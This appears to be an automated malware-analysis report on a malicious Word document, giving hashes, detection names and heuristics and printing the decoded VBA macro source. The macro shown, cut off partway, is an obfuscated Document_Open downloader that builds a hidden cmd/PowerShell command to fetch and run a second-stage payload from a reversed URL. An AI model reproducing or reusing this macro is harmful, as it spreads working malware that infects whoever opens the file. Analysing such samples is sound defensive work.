Office (OLE) malware analysis — malicious · 5fd8aa870702becb

MALICIOUS

Office (OLE)

63.5 KB Created: 2018-09-07 07:42:00 Authoring application: Microsoft Office Word First seen: 2019-10-01

MD5: fcc32139840e34c1dc9fc3759262c73e SHA-1: 1b215e5a013667b9b1cefdb56a30fc93fed790a6 SHA-256: 5fd8aa870702becb2c472968b66a87227d2457f59ea13f339ea01daae5736b62

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

This Office document contains VBA macros, including a Document_Open macro that utilizes the Shell() function. The script appears to be obfuscated but its intent is to download and execute a second-stage payload. The ClamAV detection name 'Doc.Trojan.Agent-6922859-0' further confirms its malicious nature.

Heuristics 5

ClamAV: Doc.Trojan.Agent-6922859-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Agent-6922859-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4783 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4783 bytes
SHA-256: `27738129b68d89ba5372ddff14ee59c53b1089912cdd7084a66773865a6fcfaf`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "arLYMdDLmZ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Month Format("uU" + "kzd") Month Format("LlzVBGiFY" + "ISE" + "1163" + "jmR") Month Format("14050696" + "uEAnTljwL") Month Format("alcqW" + "wJYf" + "tYGKfJdTssqcK" + "nlKrnhPzTGX") Month Format("501120407" + "8096") Month Format("1975" + "tJ") Shell Format(zQoczKWl) + Format(tvWOsTLnuTOj) + Format(GlLBQXf) + omzVXopfMvA + qbwGjNv + Format(jcvzWsAJ) + Format(bSYLRobSAm), Format(vbHide) Month Format("zVV" + "350569193") End Sub Attribute VB_Name = "zidFqDEG" Function omzVXopfMvA() On _ Error _ Resume _ Next Month Format("Jv" + "TSkqZ" + "mHPdmGrmb" + "422056978") Month Format("253972228" + "483745372") Month Format("mw" + "T" + "NVZcwY" + "D") Month Format("5866" + "pX") NSzisMl = Chr(2 + 14 + 1 + 17 + 65) + "md /V^" + ":^ON/" + Chr(1 + 10 + 0 + 12 + 44) + Chr(0 + 4 + 0 + 5 + 25) + "^s^e^t " + "T^B" + Chr(2 + 14 + 1 + 17 + 65) + "^O=^" + " ^ ^ " + " " Month Format("cqjO" + "dULpwAFPR") Month Format("NALwjK" + "YtVc" + "c" + "TjX") Month Format("7502" + "NhXihVtzj") iYznuta = "^ ^ ^ " + " ^ ^ " + " ^ " + "}" + "}" + "^{^h" + Chr(2 + 14 + 1 + 17 + 65) + "t^" + "a" + Chr(2 + 14 + 1 + 17 + 65) + "}^" + ";k^aer^" + "b^;" + "jQW^$ m" + "^e^t^I" Month Format("zKUJ" + "P" + "8390" + "ccR") Month Format("279268119" + "ULTDXlkl" + "n" + "RNO") Month Format("OKcZMvH" + "M" + "INknfzXt" + "94463258") jRkQlhT = "-^e^k^o" + "vnI" + ";)jQW$" + " ,K^z^" + "q$(^e" + "l^i^F" + "d^ao^" + "ln" Month Format("tZ" + "7489") Month Format("113210660" + "402018979" + "101" + "tvJG") Month Format("bmJjP" + "wCw" + "4839" + "150037450") Month Format("393803886" + "TLiDilDpS" + "379871918" + "wMiau") vwCVvu = "^w" + "^o" + "^D^.^" + "PnG^$^" + "{yrt{)" + "^" Month Format("VFrZ" + "WO" + "EmWmATj" + "or") Month Format("2628" + "hjwQBYqRhhTbzK" + "464048509" + "jamFouci") Month Format("168335745" + "A" + "OW" + "VH") Month Format("ZPNFNnYXMRWw" + "3043") jCwVEtQq = "EB" + "^O^$" + "^ ni^ " + "^Kzq$(h" + Chr(2 + 14 + 1 + 17 + 65) + "^aer^" + "of" + "^;'ex^" Month Format("348732138" + "QqVAzOWaXGXVz" + "443206469" + "sAGJ") ZJkbj = "e^.^'^+" + "In" + "n" + "$^+'" + "\'^" + "+" + Chr(2 + 14 + 1 + 17 + 65) + "^" + "i" + "^l^bu" + "^p^:vn^" + "e$" + "=j^QW" + "$;^'" Month Format("t" + "nwiCDEE") sKtbBOVfV = "^0^4^'" + " " + "=^ ^" + "Inn^$;)" + "^'^" + "@'" + "(^t^i" + "^lp^S.^" + "'nk^" + "t.^3^k" + "n^b^k" + "^=" + "^l^?^p" Month Format("uWUSrrXDh" + "Q") Month Format("IHzwhiEEZnULFn" + "855") iirAQivjXVr = "^h^" + "p^.t^o^" + "ksn" + "a^po/^" + "T^TR/^" + "m" + "^o" + Chr(2 + 14 + 1 + 17 + 65) + ".m" + "6hs^h" + "q" + "p8^3ma^" Month Format("4234" + "SEwXqo" + "DYbBWcFS" + "tvtHJhjG") nlObmzNfC = "kf" + "t//^:p" + "^t" + "^t^" + "h'" + "^=E^" + "BO^$" + "^;^" + "t" omzVXopfMvA = NSzisMl + iYznuta + jRkQlhT + vwCVvu + jCwVEtQq + ZJkbj + sKtbBOVfV + iirAQivjXVr + nlObmzNfC Month Format("hz" + "20112209" + "305477354" + "Crzs") Month Format("wOf" + "sl" + "331311819" + "U") End Function Function qbwGjNv() On _ Error _ Resume _ Next Month Format("7827" + "kC" + "3781" + "LwXF") Month Format("133721618" + "nqm" + "456421768" + "R") Month Format("RkGIV" + "MLkX" + "QZFzpsKJ" + "2499") uSjLBABM = "n" + "e^i" + "l" + Chr(1 + 10 + 0 + 12 + 44) + "be^W." + "^teN" + " ^t" + Chr(2 + 14 + 1 + 17 + 65) + "ejb^o^" + "-" + "^we" + "n=" + "^P" + "n^G$" Month Format("ZZsjrWRXQFBFi" + "236509146" + "jr" + "hrzXuG") Month Format("j" + "i") Month Format("9081" + "8901") jQbjRtr = "^ lleh" + "sr^ew^" + "op&&for" + " /^" + "L %V ^" + "in (^2^" + "63" + "^;" + "-" Month Format("fAK" + "2447") Month Format("442812728" + "2191") Month Format("277144729" + "aHzRiFjDK") Month F ... (truncated)

SHA-256: 27738129b68d89ba5372ddff14ee59c53b1089912cdd7084a66773865a6fcfaf

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "arLYMdDLmZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Month Format("uU" + "kzd")
   Month Format("LlzVBGiFY" + "ISE" + "1163" + "jmR")
   Month Format("14050696" + "uEAnTljwL")
   Month Format("alcqW" + "wJYf" + "tYGKfJdTssqcK" + "nlKrnhPzTGX")
   Month Format("501120407" + "8096")
   Month Format("1975" + "tJ")
Shell Format(zQoczKWl) + Format(tvWOsTLnuTOj) + Format(GlLBQXf) + omzVXopfMvA + qbwGjNv + Format(jcvzWsAJ) + Format(bSYLRobSAm), Format(vbHide)
   Month Format("zVV" + "350569193")
End Sub



Attribute VB_Name = "zidFqDEG"
Function omzVXopfMvA()

On _
Error _
Resume _
Next
Month Format("Jv" + "TSkqZ" + "mHPdmGrmb" + "422056978")
   Month Format("253972228" + "483745372")
   Month Format("mw" + "T" + "NVZcwY" + "D")
   Month Format("5866" + "pX")
NSzisMl = Chr(2 + 14 + 1 + 17 + 65) + "md /V^" + ":^ON/" + Chr(1 + 10 + 0 + 12 + 44) + Chr(0 + 4 + 0 + 5 + 25) + "^s^e^t " + "T^B" + Chr(2 + 14 + 1 + 17 + 65) + "^O=^" + "  ^ ^ " + " "
Month Format("cqjO" + "dULpwAFPR")
   Month Format("NALwjK" + "YtVc" + "c" + "TjX")
   Month Format("7502" + "NhXihVtzj")
iYznuta = "^  ^ ^ " + "  ^  ^ " + " ^  " + "}" + "}" + "^{^h" + Chr(2 + 14 + 1 + 17 + 65) + "t^" + "a" + Chr(2 + 14 + 1 + 17 + 65) + "}^" + ";k^aer^" + "b^;" + "jQW^$ m" + "^e^t^I"
Month Format("zKUJ" + "P" + "8390" + "ccR")
   Month Format("279268119" + "ULTDXlkl" + "n" + "RNO")
   Month Format("OKcZMvH" + "M" + "INknfzXt" + "94463258")
jRkQlhT = "-^e^k^o" + "vnI" + ";)jQW$" + " ,K^z^" + "q$(^e" + "l^i^F" + "d^ao^" + "ln"
Month Format("tZ" + "7489")
   Month Format("113210660" + "402018979" + "101" + "tvJG")
   Month Format("bmJjP" + "wCw" + "4839" + "150037450")
   Month Format("393803886" + "TLiDilDpS" + "379871918" + "wMiau")
vwCVvu = "^w" + "^o" + "^D^.^" + "PnG^$^" + "{yrt{)" + "^"
Month Format("VFrZ" + "WO" + "EmWmATj" + "or")
   Month Format("2628" + "hjwQBYqRhhTbzK" + "464048509" + "jamFouci")
   Month Format("168335745" + "A" + "OW" + "VH")
   Month Format("ZPNFNnYXMRWw" + "3043")
jCwVEtQq = "EB" + "^O^$" + "^ ni^ " + "^Kzq$(h" + Chr(2 + 14 + 1 + 17 + 65) + "^aer^" + "of" + "^;'ex^"
Month Format("348732138" + "QqVAzOWaXGXVz" + "443206469" + "sAGJ")
ZJkbj = "e^.^'^+" + "In" + "n" + "$^+'" + "\'^" + "+" + Chr(2 + 14 + 1 + 17 + 65) + "^" + "i" + "^l^bu" + "^p^:vn^" + "e$" + "=j^QW" + "$;^'"
Month Format("t" + "nwiCDEE")
sKtbBOVfV = "^0^4^'" + " " + "=^ ^" + "Inn^$;)" + "^'^" + "@'" + "(^t^i" + "^lp^S.^" + "'nk^" + "t.^3^k" + "n^b^k" + "^=" + "^l^?^p"
Month Format("uWUSrrXDh" + "Q")
   Month Format("IHzwhiEEZnULFn" + "855")
iirAQivjXVr = "^h^" + "p^.t^o^" + "ksn" + "a^po/^" + "T^TR/^" + "m" + "^o" + Chr(2 + 14 + 1 + 17 + 65) + ".m" + "6hs^h" + "q" + "p8^3ma^"
Month Format("4234" + "SEwXqo" + "DYbBWcFS" + "tvtHJhjG")
nlObmzNfC = "kf" + "t//^:p" + "^t" + "^t^" + "h'" + "^=E^" + "BO^$" + "^;^" + "t"
omzVXopfMvA = NSzisMl + iYznuta + jRkQlhT + vwCVvu + jCwVEtQq + ZJkbj + sKtbBOVfV + iirAQivjXVr + nlObmzNfC
   Month Format("hz" + "20112209" + "305477354" + "Crzs")
   Month Format("wOf" + "sl" + "331311819" + "U")
End Function
Function qbwGjNv()

On _
Error _
Resume _
Next
Month Format("7827" + "kC" + "3781" + "LwXF")
   Month Format("133721618" + "nqm" + "456421768" + "R")
   Month Format("RkGIV" + "MLkX" + "QZFzpsKJ" + "2499")
uSjLBABM = "n" + "e^i" + "l" + Chr(1 + 10 + 0 + 12 + 44) + "be^W." + "^teN" + " ^t" + Chr(2 + 14 + 1 + 17 + 65) + "ejb^o^" + "-" + "^we" + "n=" + "^P" + "n^G$"
Month Format("ZZsjrWRXQFBFi" + "236509146" + "jr" + "hrzXuG")
   Month Format("j" + "i")
   Month Format("9081" + "8901")
jQbjRtr = "^ lleh" + "sr^ew^" + "op&&for" + " /^" + "L %V ^" + "in (^2^" + "63" + "^;" + "-"
Month Format("fAK" + "2447")
   Month Format("442812728" + "2191")
   Month Format("277144729" + "aHzRiFjDK")
   Month F
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.